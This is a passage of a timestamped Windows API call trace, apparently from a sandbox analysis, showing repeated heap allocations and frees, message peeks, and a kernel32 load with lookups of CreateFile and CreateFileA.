lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd510 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de830 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de9e8 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de7e0 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.955] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea10 | out: hHeap=0x8a0000) returned 1 [0178.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0178.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1930 | out: hHeap=0x8a0000) returned 1 [0178.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0178.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0178.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba180 | out: hHeap=0x8a0000) returned 1 [0178.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0178.956] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90ad98 | out: hHeap=0x8a0000) returned 1 [0178.956] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.956] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0178.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1930 [0178.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0178.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0178.956] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0178.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0178.956] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0178.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0178.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x1) returned 0x8e1980 [0178.956] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba180 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0178.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0178.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd990 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea10 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd840 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd858 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a60 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0f0 [0178.957] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0178.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd4e0 [0178.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8b8 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0178.957] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.957] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd588 [0178.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3a8 [0178.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9c70 [0178.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0178.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b60 [0178.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0178.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0178.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de920 | out: hHeap=0x8a0000) returned 1 [0178.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0178.958] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.958] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x40) returned 0x8db0a8 [0178.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0178.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd708 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd600 [0178.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9b50 [0178.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.959] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4e0 [0178.959] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x80) returned 0x9c0b78 [0178.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db0a8 | out: hHeap=0x8a0000) returned 1 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1b20 [0178.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b20 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0178.960] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1960 | out: hHeap=0x8a0000) returned 1 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1960 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.960] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.960] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.961] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.961] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0178.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1900 [0178.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0178.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0178.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0178.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.962] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.962] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.962] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0178.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0178.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9ba3f0 [0178.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9ba3f0, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0178.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.963] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0178.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0178.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0178.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de920 [0178.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0178.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b60 [0178.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0178.963] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9ba3f0 [0178.963] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9ba3f0, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0178.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0178.963] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0178.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0178.963] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b60 | out: hHeap=0x8a0000) returned 1 [0178.963] HeapFree (in: hHeap=0x8a0000, 